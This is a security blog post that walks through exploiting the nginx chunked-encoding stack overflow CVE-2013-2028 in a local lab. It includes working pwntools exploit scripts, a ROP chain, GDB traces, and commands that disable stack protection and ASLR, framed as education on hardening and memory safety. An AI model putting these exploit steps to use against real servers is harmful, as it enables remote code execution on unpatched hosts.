Protecting devices from malicious use is often a cat-and-mouse game between security researchers identifying software vulnerabilities (CVEs) and product makers patching them before attackers can exploit them. As a result, devices can no longer be developed, shipped and forgotten. Instead, manufacturers must commit to keeping those devices up to date and free from critical vulnerabilities for the life of the product. We often get asked to support this by identifying, triaging and patching vulnerabilities in Linux distributions. Whilst doing so we’ve often wondered: just how easy or practical is it to exploit a vulnerability (CVE)? Furthermore, as part of our involvement in UKRI’s Digital Security by Design challenge with Iceotope, we’re also keen to see how more secure Instruction Set Architectures (ISAs), such as Arm’s CHERI-based Morello platform, can mitigate these vulnerabilities. In this blog post we’re going to look at a published CVE and attempt to exploit it.
CVE-2013-2028
Let’s take a look at CVE-2013-2028 from 2013, which relates to the nginx HTTP web server. It’s described as follows:
“The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.”
It has a CVSS score of 7.5 (indicating its severity) and is a very simple example of a vulnerability that can lead to remote code execution via a stack-based buffer overflow. It’s also been characterised by the Common Weakness Enumeration (CWE) as CWE-787, which describes the class of vulnerability as an “Out-of-bounds Write”. This type of vulnerability is naturally quite troubling given the potential impact and the ability to exploit it remotely.
Building nginx
Before we attempt to exploit this vulnerability, let’s download and build the old and vulnerable version of nginx as follows:
$ git clone --single-branch --branch release-1.4.0 git@github.com:nginx/nginx.git
$ cd nginx
$ ./auto/configure
$ make
$ sudo make install
As this version of the software is more than 10 years old, and given we’re building it on a recent Ubuntu 22.04 distribution, some changes to the source are needed to avoid compilation errors caused by more modern compiler and system library versions. It was necessary for us to modify ngx_linux_config.h to remove an unnecessary include of <sys/sysctl.h>, and to comment out a no-longer-needed line in ngx_user.c. We can now finally run nginx as follows:
$ sudo /usr/local/nginx/sbin/nginx -g "daemon off;error_log /dev/stdout debug;"
The Two Bugs that Allow a Buffer Overflow
These days, it can be trivial to exploit vulnerable software with limited knowledge of the vulnerability thanks to tools such as Metasploit. However, we’d like to fully understand the vulnerability and its exploit. As this is a buffer-overflow vulnerability, let’s take a look at the buffer of interest in ngx_http_request_body.c.
static ngx_int_t
ngx_http_read_discarded_request_body(ngx_http_request_t *r)
{
    size_t     size;
    ssize_t    n;
    ngx_int_t  rc;
    ngx_buf_t  b;
    u_char     buffer[NGX_HTTP_DISCARD_BUFFER_SIZE];
$ git grep "define NGX_HTTP_DISCARD_BUFFER_SIZE"
src/http/ngx_http_request.h:#define NGX_HTTP_DISCARD_BUFFER_SIZE 4096
This is the buffer we intend to overflow. It’s declared on the stack and is of size NGX_HTTP_DISCARD_BUFFER_SIZE, which is 4096 bytes. Given this isn’t a memory-safe language, it’s possible to write more data into the buffer than it can hold, resulting in a buffer overflow which will overwrite whatever else comes next on the stack.
A little later into this ngx_http_read_discarded_request_body function, we can see that data is written into this buffer via a call to recv, as follows:
size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
n = r->connection->recv(r->connection, buffer, size);
$ git grep "define ngx_min"
src/core/ngx_core.h:#define ngx_min(val1, val2) ((val1 > val2) ? (val2) : (val1))
The recv function is used to transfer up to the specified number of bytes (size) into our buffer. You’ll see that the ngx_min macro is used to ensure that we don’t exceed and overflow the maximum size of the buffer: it does this by picking the smaller of NGX_HTTP_DISCARD_BUFFER_SIZE and the amount of data available to write. Therefore it shouldn’t be possible to write beyond the end of the buffer, right?
Unfortunately, there is an issue here. Let’s look at the type used for content_length_n. It’s defined as an off_t, which is usually a signed integer and thus may hold a negative value. Oopsies!
$ git grep content_length_n src/http/ngx_http_request.h
src/http/ngx_http_request.h: off_t content_length_n;
src/http/ngx_http_request.h: off_t content_length_n;
So let’s examine what may happen if content_length_n holds a negative number:
size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
# expand out ngx_min macro (size = (size_t) ((val1 > val2) ? (val2) : (val1)))
size = (size_t) ((r->headers_in.content_length_n > NGX_HTTP_DISCARD_BUFFER_SIZE) ? (NGX_HTTP_DISCARD_BUFFER_SIZE) : (r->headers_in.content_length_n))
# substitute values for content_length_n and NGX_HTTP_DISCARD_BUFFER_SIZE
size = (size_t) ((-100 > 4096) ? (4096) : (-100))
size = (size_t) -100
# cast from off_t (signed) to size_t (unsigned); on our 64-bit build size_t is 64 bits wide
size = 18446744073709551516
Ouch! So when we use a negative value for content_length_n (e.g. -100), ngx_min selects this value as it is smaller than 4096. Unfortunately, we then cast the signed integer -100 into a size_t, which is unsigned, and due to the way the number is represented in bits we end up with a huge number, far larger than the buffer size. This means that if we can somehow set content_length_n to a negative number, we can trick the recv call into writing more data into buffer than it can hold.
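The arithmetic is easy to reproduce in a few lines of Python (a sketch of the C behaviour, assuming a 64-bit size_t; on a 32-bit system the same cast would instead yield 4294967196):

```python
import ctypes

# ngx_min as defined in nginx: ((val1 > val2) ? (val2) : (val1))
def ngx_min(val1, val2):
    return val2 if val1 > val2 else val1

NGX_HTTP_DISCARD_BUFFER_SIZE = 4096

content_length_n = -100  # attacker-controlled, signed off_t
picked = ngx_min(content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE)
print(picked)  # -100: the "smaller" value wins

# the (size_t) cast reinterprets the signed value as unsigned
size_t_value = ctypes.c_uint64(picked).value
print(size_t_value)  # 18446744073709551516, i.e. 2**64 - 100
```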
So, how can we get a negative number into content_length_n? This time we can take advantage of an integer overflow elsewhere in the code base. Nginx is a web server, and to talk to the world it uses the Hypertext Transfer Protocol (HTTP). A feature of this protocol is the ability to specify how data is encoded; for example, it may be compressed. In order to exploit the vulnerability we need to use ‘chunked transfer encoding’, where data is sent in chunks without the full size being known up front (which may be useful for streaming large amounts of data). A typical ‘chunked’ request from the client may look like this:
GET / HTTP/1.1\lf
Host: 127.0.0.1\lf
Transfer-Encoding: chunked\cr\lf\cr\lf
4\cr\lf
data\cr\lf
9\cr\lf
more data\cr\lf
0\cr\lf
\cr\lf
Above we’re making a request to host 127.0.0.1 and sending two chunks of data. Each chunk starts with an ASCII representation of the size of the chunk (in octets) followed by the data. In this case we have a chunk of 4 octets with data ‘data’, then a 9-octet chunk with data ‘more data’, followed by a terminating chunk.
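The chunk framing is easy to reproduce; as a rough sketch (the helper name is our own), the following Python builds the same body:

```python
def chunked_body(chunks):
    """Frame each chunk as <hex size>\\r\\n<data>\\r\\n, ending with a zero-size chunk."""
    out = b""
    for chunk in chunks:
        out += format(len(chunk), "x").encode("ascii") + b"\r\n" + chunk + b"\r\n"
    return out + b"0\r\n\r\n"  # terminating chunk

print(chunked_body([b"data", b"more data"]))
# b'4\r\ndata\r\n9\r\nmore data\r\n0\r\n\r\n'
```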
Nginx parses chunked requests in function ngx_http_parse_chunked of ngx_http_parse.c, a snippet of this code follows:
    case sw_chunk_start:
        if (ch >= '0' && ch <= '9') {
            state = sw_chunk_size;
            ctx->size = ch - '0';
            break;
        }

        c = (u_char) (ch | 0x20);

        if (c >= 'a' && c <= 'f') {
            state = sw_chunk_size;
            ctx->size = c - 'a' + 10;
            break;
        }

        goto invalid;

    case sw_chunk_size:
        if (ch >= '0' && ch <= '9') {
            ctx->size = ctx->size * 16 + (ch - '0');
            break;
        }

        c = (u_char) (ch | 0x20);

        if (c >= 'a' && c <= 'f') {
            ctx->size = ctx->size * 16 + (c - 'a' + 10);
            break;
        }
This snippet of code decodes bytes of the request, converting successive ASCII characters into a size variable representing the size of the next chunk of data, and it keeps doing this until it sees a \cr\lf pair. The problem is that malicious input, for example a long string of hexadecimal characters, can overflow the size variable, which is once again of signed type off_t, resulting in a negative number. The ngx_http_parse_chunked function goes on to determine how much more data needs to be read from the network socket (ctx->length) based on this size value (ctx->size). ctx->length is then later assigned to content_length_n (which, if you remember, is the amount of data we read into buffer via the recv call) in the ngx_http_discard_request_body_filter function.
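We can simulate the effect of that accumulation loop on a 64-bit signed off_t (our own sketch, not nginx code): a long enough run of hex digits wraps the value negative.

```python
def to_int64(v):
    """Truncate to 64 bits and reinterpret as a signed value, like C's off_t wraparound."""
    v &= (1 << 64) - 1
    return v - (1 << 64) if v >= (1 << 63) else v

def parse_chunk_size(hex_digits):
    """Accumulate ASCII hex digits into a signed 64-bit size, as the parser does."""
    size = 0
    for ch in hex_digits:
        size = to_int64(size * 16 + int(ch, 16))
    return size

print(parse_chunk_size("1000"))     # 4096: a benign chunk size
print(parse_chunk_size("f" * 16))   # -1: sixteen 'f's wrap to all-ones, i.e. negative
```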
Therefore it’s possible, and very easy, for an attacker to construct a malicious HTTP chunked request to a vulnerable nginx server which, due to an integer overflow and a signed-to-unsigned cast, allows us to write more data into buffer than it is designed to hold. By the way, the fix for this vulnerability is in commit 4997de8005630, which looks like this:
diff --git a/src/http/ngx_http_parse.c b/src/http/ngx_http_parse.c
index 34b3b85d060d..3c168aaf25b6 100644
--- a/src/http/ngx_http_parse.c
+++ b/src/http/ngx_http_parse.c
@@ -2209,6 +2209,10 @@ data:
     }
 
+    if (ctx->size < 0 || ctx->length < 0) {
+        goto invalid;
+    }
+
     return rc;
 
 done:
Exploiting the Buffer Overflow to Manipulate Flow of Execution
So now that we understand the vulnerability, let’s exploit it. To help understand how, let’s use GDB to examine the stack frame that holds the vulnerable buffer:
$ sudo gdb /usr/local/nginx/sbin/nginx
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
https://www.gnu.org/software/gdb/bugs/.
Find the GDB manual and other documentation resources online at:
http://www.gnu.org/software/gdb/documentation/.
For help, type "help".
Type "apropos word" to search for commands related to "word"…
Reading symbols from /usr/local/nginx/sbin/nginx…
(gdb) set args -g "daemon off;"
(gdb) set follow-fork-mode child
(gdb) b ngx_http_read_discarded_request_body
Breakpoint 1 at 0x4064a: file src/http/ngx_http_request_body.c, line 627.
(gdb) r
Starting program: /usr/local/nginx/sbin/nginx -g "daemon off;"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Attaching after Thread 0x7ffff7eb6340 (LWP 1105576) fork to child process 1105579]
[New inferior 2 (process 1105579)]
[Detaching after fork from parent process 1105576]
[Inferior 1 (process 1105576) detached]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Switching to Thread 0x7ffff7eb6340 (LWP 1105579)]
Now that nginx is running in GDB, let’s use a simple Python script to send a chunked request. Please note that we’ve based this work on pre-existing exploit code which can be found here.
from pwn import *

base_payload = """GET / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked\r\n\r\n"""

def main():
    ps = connect("127.0.0.1", "80")
    ps.send(base_payload)

if __name__ == "__main__":
    main()
Running this script will allow us to trigger our ngx_http_read_discarded_request_body breakpoint. We can use this to examine the stack.
(gdb) info locals
size = <optimized out>
n = <optimized out>
rc = <optimized out>
b = {pos = 0xf , last = 0x0, file_pos = 93824993091356, file_last = 93824993097552,
start = 0x7fffffffe590 "\001", end = 0x0, tag = 0x340, file = 0x10102464c457f, shadow = 0x0, temporary = 1, memory = 1, mmap = 0, recycled = 0,
in_file = 0, flush = 0, sync = 0, last_buf = 0, last_in_chain = 0, last_shadow = 0, temp_file = 0, num = 1}
buffer = "\000\000\000\000\000\000\000\000@\000\000\000\000\000\000\000\310\003\001\000\000\000\000\000\000\000\000\000@\000\070\000\v\000@\000 \000\037\000\001\000\000\000\004", '\000' , "\350/\000\000\000\000\000\000\350/\000\000\000\000\000\000\000\020\000\000\000\000\000\000\001\000\000\000\005\000\000\000\000\060\000\000\000\000\000\000\000\060\000\000\000\000\000\000\000\060\000\000\000\000\000\000\071\222\000\000\000\000\000\000\071\222\000\000\000\000\000\000\000\020\000\000\000\000\000\000\001\000\000\000\004\000\000\000\000\320\000\000\000\000\000\000\000\320\000\000\000\000\000\000\000\320\000\000\000\000\000\000(%\000\000\000\000\000\000(%\000\000\000\000\000\000\000"…
(gdb) print sizeof(b)
$11 = 80
(gdb) print sizeof(buffer)
$12 = 4096
(gdb) print &b
$13 = (ngx_buf_t *) 0x7fffffffca20
(gdb) print &buffer
$14 = (u_char (*)[4096]) 0x7fffffffca70
(gdb) print $rsp
$15 = (void *) 0x7fffffffdab8
(gdb) print *((void **) $rsp)
$16 = (void *) 0x555555596a4b
(gdb) bt
#0  ngx_http_read_discarded_request_body (r=r@entry=0x555555609670) at src/http/ngx_http_request_body.c:627
#1  0x0000555555596a4b in ngx_http_discard_request_body (r=r@entry=0x555555609670) at src/http/ngx_http_request_body.c:528
...
From examining the stack pointer register ($rsp) we’ve learnt that upon exiting this function, the flow of execution will jump to the location stored at 0x7fffffffdab8; this currently points to the caller of this function, ngx_http_discard_request_body. We’ve also learnt that the vulnerable buffer spans memory between 0x7fffffffca70 and 0x7fffffffda70. As the return address is stored at a higher address than the vulnerable buffer, if we write too much data into the buffer it will overflow and overwrite the return address value at 0x7fffffffdab8, effectively hijacking the flow of control. Let’s update our exploit program as follows to do this:
from pwn import *

base_payload = """GET / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked\r\n\r\n"""

def main():
    ps = connect("127.0.0.1", "80")

    payload = base_payload
    payload += 'A' * (4096+962)
    payload += 'B' * 72
    payload += p64(0xDEADBEEFDEADBEEF).decode('latin-1')
    ps.send(payload)

if __name__ == "__main__":
    main()
This time, in addition to sending the HTTP chunked header, we also send additional data. We start by sending lots of ‘A’ characters. The purpose of this is to trigger the chunk parsing overflow and to overflow the vulnerable buffer. The reason for the additional 962 bytes is to account for the data consumed by the ngx_http_parse_chunked handling.
From observation in GDB, we previously learnt that the return address is 72 bytes on from the end of the buffer (0x7fffffffdab8 – 0x7fffffffda70) and thus we send additional characters to consume this gap.
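Those padding figures fall straight out of the addresses GDB reported; as a quick sanity check in Python:

```python
buffer_start = 0x7FFFFFFFCA70   # &buffer, as reported by GDB
buffer_end   = buffer_start + 4096
ret_addr     = 0x7FFFFFFFDAB8   # where the saved return address lives ($rsp)

print(buffer_end - buffer_start)  # 4096: bytes needed to fill the buffer itself
print(ret_addr - buffer_end)      # 72: further bytes to reach the return address
```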
Finally, we write a new return address, in this case we’ve used an easily identifiable sequence of characters – 0xDEADBEEFDEADBEEF.
In theory, it should be possible to fill the buffer with machine code (or shell code as the cool kids say), rather than ‘A’s or ‘B’s, and then overwrite the return address to point to the machine code in our buffer. Thus giving us the ability to remotely execute our own code on the vulnerable machine. Unfortunately, it’s not that easy thanks to various hardening techniques employed by the compiler and C library. Let’s see what happens when we run our exploit.
$ sudo /usr/local/nginx/sbin/nginx -g "daemon off;error_log /dev/stdout debug;"
2024/12/19 00:10:29 [notice] 1124170#0: using the "epoll" event method
2024/12/19 00:10:29 [notice] 1124170#0: nginx/1.4.0
2024/12/19 00:10:29 [notice] 1124170#0: built by gcc 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
2024/12/19 00:10:29 [notice] 1124170#0: OS: Linux 6.5.0-41-generic
2024/12/19 00:10:29 [notice] 1124170#0: getrlimit(RLIMIT_NOFILE): 1024:1048576
2024/12/19 00:10:29 [notice] 1124170#0: start worker processes
2024/12/19 00:10:29 [notice] 1124170#0: start worker process 1124171
2024/12/19 00:10:39 [error] 1124171#0: *1 client sent invalid chunked body, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", host: "127.0.0.1"
*** stack smashing detected ***: terminated
2024/12/19 00:10:39 [notice] 1124170#0: signal 17 (SIGCHLD) received
2024/12/19 00:10:39 [alert] 1124170#0: worker process 1124171 exited on signal 6 (core dumped)
2024/12/19 00:10:39 [notice] 1124170#0: start worker process 1124193
You’ll see that, due to GCC’s ‘stack-protector’ feature, GCC has detected that we attempted to smash the stack. When GCC compiles code with this feature enabled, it adds a canary guard variable to the stack frame and initialises its value upon entering the function. When the function exits, additional code verifies that the value hasn’t changed; if it has, the program aborts. In our case the guard variable sits somewhere between the vulnerable buffer and the location of the return address. We don’t know what this value will be (it’s random), and so when we overflow the buffer we can’t write the correct guard value. We can see this guard variable in our stack frame:
(gdb) x/100x 0x7fffffffda50
0x7fffffffda50: 0x00000021 0x00000000 0x55609670 0x00005555
0x7fffffffda60: 0x55610d60 0x00005555 0x5560a540 0x00005555
0x7fffffffda70: 0x555cf187 0x00005555 0x25577300 0x91b88538
0x7fffffffda80: 0x5561d5d0 0x00005555 0x55609670 0x00005555
0x7fffffffda90: 0xaaaaaab0 0xaaaaaaaa 0x55629ad0 0x00005555
0x7fffffffdaa0: 0x5560e680 0x00005555 0x00000195 0x00000000
0x7fffffffdab0: 0x5561d5d0 0x00005555 0x55596ab2 0x00005555
The first two lines of the above memory dump show the last bytes of the 4096-byte buffer. The last 8 bytes of the output represent the return address that we wish to manipulate. The 8 bytes starting at 0x7fffffffda78 represent the guard value; it’s a random value which changes on each run. For fun, and without our exploit payload, we set a breakpoint in ngx_http_read_discarded_request_body, manually overwrote the guard variable after it had been initialised, and saw the “stack smashing detected” error upon function exit.
It’s possible to work around the guard value through brute force. For example, an attacker can send many requests to nginx, cycling through the possible values for this variable; if the connection is terminated, the guess was incorrect. A good example of how to do that for this vulnerability can be found here. This should also serve as a reminder of why it can be helpful to review access logs to identify such unusual behaviour. However, to simplify our exploit we’ll just turn this feature off via GCC’s “-fno-stack-protector” flag.
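As an aside, the reason brute force is viable against a forking server like nginx is that each worker forked from the master inherits the same canary, so it can be guessed one byte at a time rather than all eight bytes at once. A toy simulation of the idea (our own illustration, not exploit code):

```python
import os

SECRET_CANARY = os.urandom(8)   # stands in for the worker's stack guard

def worker_survives(guess):
    """Simulate a forked worker: it 'crashes' unless the overwritten prefix matches."""
    return SECRET_CANARY.startswith(guess)

recovered = b""
for _ in range(8):              # one stack-guard byte at a time
    for byte in range(256):     # at most 256 'requests' per byte
        if worker_survives(recovered + bytes([byte])):
            recovered += bytes([byte])
            break

print(recovered == SECRET_CANARY)  # True: at most 8 * 256 guesses, not 2**64
```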
If we attempt our exploit again, we now see the following:
2024/12/19 00:53:35 [alert] 1129073#0: worker process 1129074 exited on signal 11 (core dumped)
This is reasonable to expect, given that we are redirecting execution to the (unmapped) address 0xdeadbeefdeadbeef. Instead of this value, we could have used the address of a pre-existing function in nginx, so let’s try that. By examining the nginx binary with objdump -dSx we can see the following snippet of disassembly:
ngx_write_stderr("nginx version: " NGINX_VER NGX_LINEFEED);
ff86: 48 8d 3d aa 31 06 00 lea 0x631aa(%rip),%rdi # 73137 <_IO_stdin_used+0x137>
ff8d: e8 74 fb ff ff call fb06 <ngx_write_stderr>
This is a small snippet of code that calls ngx_write_stderr to print out the version of nginx. We can see that the offset of this code in the .text section of the binary is 0xff86. However, we need to identify its location once it has been relocated by the loader into memory. Given that we have GDB running, we can look up the location of main in the binary’s symbol table and compare that to where it’s actually located in memory to work out an offset:
(gdb) p main
$1 = {int (int, char * const *)} 0x555555563b21
$ objdump -x objs/nginx | grep " main$"
000000000000fb21 g F .text 0000000000000bc2 main
Here we see that main is in memory at 0x555555563b21, whereas its offset in the .text section was 0xfb21, giving a load offset of 0x555555554000. We can use this knowledge to calculate that the call to ngx_write_stderr will be at 0x555555554000 + 0xff86 = 0x555555563f86.
Let’s see what happens when we run our exploit payload with address 0x555555563F86 instead of 0xdeadbeefdeadbeef:
2024/12/19 23:28:22 [error] 1217828#0: *1 client sent invalid chunked body, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", host: "127.0.0.1"
nginx version: nginx/1.4.0
Thread 5.1 "nginx" received signal SIGSEGV, Segmentation fault.
As you can see, we successfully redirected the flow of execution to a function of our choosing. Therefore, is it possible to set the return address to execute code that we’ve placed in the vulnerable buffer? Unfortunately, once again the toolchain by default marks the stack as non-executable, preventing this exploit (the checksec utility can be used to inspect the stack permissions), though adding the “-z execstack” option to GCC would allow it.
Return Oriented Programming
Given the difficulty of executing malicious code placed on the stack, attackers commonly use a technique known as return-oriented programming (ROP). Instead of writing our own code, we identify small pieces of machine code that already exist in the application or its shared libraries and that typically end in a return instruction. We can then manipulate the stack to chain these pieces of code (known as gadgets) together to provide Turing-complete functionality. For example, if you wanted to call the C library ‘puts’ function, you could find machine code that pops values from the stack into the CPU registers used for function arguments, and then jump into the C library function. A more complex example would be to chain multiple gadgets together to call mprotect to enable execute permissions on shellcode provided in the buffer; this shellcode could then provide a reverse shell allowing command-line access to the vulnerable machine (see this example here).
Let’s construct a simple chain of gadgets that allows us to call ‘puts’. We’ll need to pass a parameter to puts (the string we want to print), so let’s look for a gadget that can do that for us. We’ll use the ROPgadget utility to list all identified gadgets in our binary, and search for one that will pop a value (from the stack) into the rdi register, which holds the first function argument in the x86-64 calling convention.
$ ROPgadget --binary objs/nginx | grep "pop rdi ; ret"
0x000000000000fb61 : pop rdi ; ret
The output shows that this gadget is present at an offset of 0xfb61 from the start of the .text section of the binary. As before, we can use gdb to help us identify where this gadget will live in memory, as follows:
$ objdump -x objs/nginx | grep main
000000000000fb21 g F .text 0000000000000bc2 main
(gdb) p &main
$6 = (int (*)(int, char * const *)) 0x555555563b21 <main>
# main is loaded at 0x555555563b21 and its .text offset is 0xfb21,
# giving a load offset of 0x555555563b21 - 0xfb21 = 0x555555554000
# Adding this offset to the gadget's offset gives its address:
# 0xfb61 + 0x555555554000 = 0x555555563b61
As shown above, we can expect this ROP gadget to live at 0x555555563b61. We can use it to set the first parameter of the puts function, which is the address of the string we want to print. We now need to identify a suitable string; for simplicity, let’s use one that already exists in the binary’s .rodata section. We can use readelf to find this:
$ readelf -p .rodata objs/nginx | grep NGINX
[ 153] NGINX
Once again this is an offset from the start of .rodata, so let’s find out where the .rodata section lives in memory via GDB:
(gdb) info files
0x00005555555c7000 - 0x00005555555d1f95 is .rodata
We can add the offset (0x153) to the address of the start of .rodata, which gives us 0x00005555555c7153.
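Both of these addresses can be sanity-checked against the load offset derived from main earlier (plain arithmetic):

```python
load_base = 0x555555563B21 - 0xFB21   # runtime address of main minus its .text offset

gadget = load_base + 0xFB61           # the 'pop rdi ; ret' gadget
string = 0x5555555C7000 + 0x153       # the "NGINX" string inside .rodata

print(hex(gadget))  # 0x555555563b61
print(hex(string))  # 0x5555555c7153
```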
Now, let’s identify the location of the C library’s puts function:
(gdb) p &puts
$6 = (int (*)(const char *)) 0x7ffff7680e50 <__GI__IO_puts>
We now have the address of a string to print, the address of a function to pass it to, and a way to place the string’s address in the register associated with the function’s first parameter. Let’s use this knowledge to construct a sequence of ROP gadgets and update our exploit payload:
from pwn import *

base_payload = """GET / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked\r\n\r\n"""

def main():
    ps = connect("127.0.0.1", "80")

    mychain = b''
    # print "NGINX" via puts
    mychain += p64(0x555555563B61)  # pop rdi ; ret
    mychain += p64(0x5555555c7153)  # address of the "NGINX" string in .rodata
    mychain += p64(0x7ffff7680e50)  # address of puts in libc
    # print "NGINX" via puts (again)
    mychain += p64(0x555555563B61)  # pop rdi ; ret
    mychain += p64(0x5555555c7153)  # address of the "NGINX" string in .rodata
    mychain += p64(0x7ffff7680e50)  # address of puts in libc
    # call exit with a return code of 4
    mychain += p64(0x555555563B61)  # pop rdi ; ret
    mychain += p64(4)               # exit value
    mychain += p64(0x7ffff76455f0)  # address of exit in libc

    payload = base_payload
    payload += 'A' * (4096+962)
    payload += 'B' * 136
    payload += mychain.decode('latin-1')
    ps.send(payload)

if __name__ == "__main__":
    main()
You’ll see that this time, rather than overwriting the return address with an arbitrary value, we point it at our ‘pop rdi’ gadget. The ‘pop rdi’ instruction takes the next value off the stack, which is the next item in our chain: the address of the string we want to print. The gadget’s ‘ret’ then transfers control to the third item in our chain, the address of the puts library function. puts reads the rdi register to determine the address of the string to print. Therefore the first three values we place on the stack result in our NGINX string being printed.
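Incidentally, pwntools’ p64 simply packs each address as a little-endian unsigned 64-bit integer, exactly as the CPU will read it from the stack; a dependency-free sketch:

```python
import struct

def p64(value):
    # little-endian unsigned 64-bit, matching pwntools' p64 on x86-64
    return struct.pack("<Q", value)

# the first link of the chain: the 'pop rdi ; ret' gadget address
print(p64(0x555555563B61).hex())  # 613b565555550000: lowest byte first
```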
Upon printing the NGINX string, the flow of execution moves to the next item in our chain, which prints the NGINX string a second time. Finally, we use the ‘pop rdi’ gadget once more to call the C library’s exit function with a return value of 4. Let’s see what happens when we run this:
(gdb) r
Starting program: /usr/local/nginx/sbin/nginx -g "daemon off;error_log /dev/stdout debug;"
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
2024/12/20 00:18:23 [notice] 1221404#0: using the "epoll" event method
2024/12/20 00:18:23 [notice] 1221404#0: nginx/1.4.0
2024/12/20 00:18:23 [notice] 1221404#0: built by gcc 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
2024/12/20 00:18:23 [notice] 1221404#0: OS: Linux 6.5.0-41-generic
2024/12/20 00:18:23 [notice] 1221404#0: getrlimit(RLIMIT_NOFILE): 1024:1048576
2024/12/20 00:18:23 [notice] 1221404#0: start worker processes
[Attaching after Thread 0x7ffff7eb6340 (LWP 1221404) fork to child process 1221405]
[New inferior 16 (process 1221405)]
[Detaching after fork from parent process 1221404]
[Inferior 15 (process 1221404) detached]
2024/12/20 00:18:23 [notice] 1221404#0: start worker process 1221405
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
NGINX
NGINX
2024/12/20 00:18:30 [notice] 1221404#0: signal 17 (SIGCHLD) received
[Inferior 16 (process 1221405) exited with code 04]
2024/12/20 00:18:30 [notice] 1221404#0: worker process 1221405 exited with code 4
(gdb) 2024/12/20 00:18:30 [notice] 1221404#0: start worker process 1221409
As you can see, we successfully used our exploit to print NGINX to the console twice and then exit gracefully with a return code of 4. Hopefully you’re beginning to see just how powerful ROP gadgets can be.
Address Space Layout Randomization
Throughout this exploit, we’ve already seen that compiler and linker features can be used to prevent exploitation. We’ve seen how the stack protector can detect stack smashing, and how the linker can enforce access permissions to prevent code on the stack from being executed. However, so far we’ve relied on hard-coded values in our Python exploit code for the locations of ROP gadgets. The Linux kernel provides a feature known as Address Space Layout Randomization (ASLR) which randomises the layout of code in the process’s address space, making it much more difficult for an attacker to create an exploit: with ASLR, the attacker first has to discover where such gadgets or library code actually live. As a result, our exploit will only work when nginx is running under GDB, because GDB disables ASLR for the process being debugged. In order for our exploit to work outside of GDB we need to disable ASLR entirely, as follows:
sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"
Of course, techniques do exist to work around ASLR; these often involve discovering the addresses of gadgets through vulnerabilities that leak memory addresses. Over time, code-generation tools and operating systems make such exploits more difficult through the addition of hardening features such as the ones we’ve mentioned in this blog post. Likewise, security researchers and attackers keep finding ever more innovative ways to overcome these hardening features.
Final Thoughts
Identifying new vulnerabilities and producing viable exploits is not a trivial task. However, it is a task being performed every day across the world, and it’s a task where the outputs are shared publicly through global databases such as NIST’s NVD. Furthermore, thanks to toolkits such as Metasploit, the level of skill needed to find a known vulnerability in a product and exploit it is relatively low. This is why best practice requires that software is kept up to date and patched for critical vulnerabilities.
You may have also noticed that when we updated our Python exploit code to add gadgets, we also updated the amount of data written before the return address. We needed to do this because, after adding “-fno-stack-protector”, the layout of the stack changed. It’s worth pointing out that exploit code often depends heavily on how the binary was built (i.e. toolchain version, library versions, etc.), and thus you’ll find that exploits from toolkits such as Metasploit assume you are targeting a specific packaged version of an application running on a specific distribution. It’s therefore more challenging to target an application in a distribution where the binary isn’t publicly available to examine; this may be an argument for using custom distributions such as Yocto, and also a reminder that exposing information (for example, memory addresses in output) can present a risk.
This blog post has also shown the importance of building binaries with the security hardening features of the toolchain enabled; there is plenty of information available online on how best to do this, for example this website.
It’s been estimated that approximately 60-70% of vulnerabilities are due to memory-safety issues: writing beyond the end of a buffer, using memory after it’s been freed, and generally accessing memory you shouldn’t. However, these issues can be largely avoided by moving away from “memory-unsafe” languages such as C and C++ to “memory-safe” languages such as Rust and Go, languages that have built-in protection to stop or detect invalid accesses.
An alternative to memory-safe languages is offered by experimental architectures such as Arm’s CHERI-based Morello platform; these architectures effectively replace pointers with capabilities that encode bounds and permissions, moving the burden of protection from software to hardware. In a future blog post we plan to explore the impact of CHERI on CVEs such as the one we’ve examined today.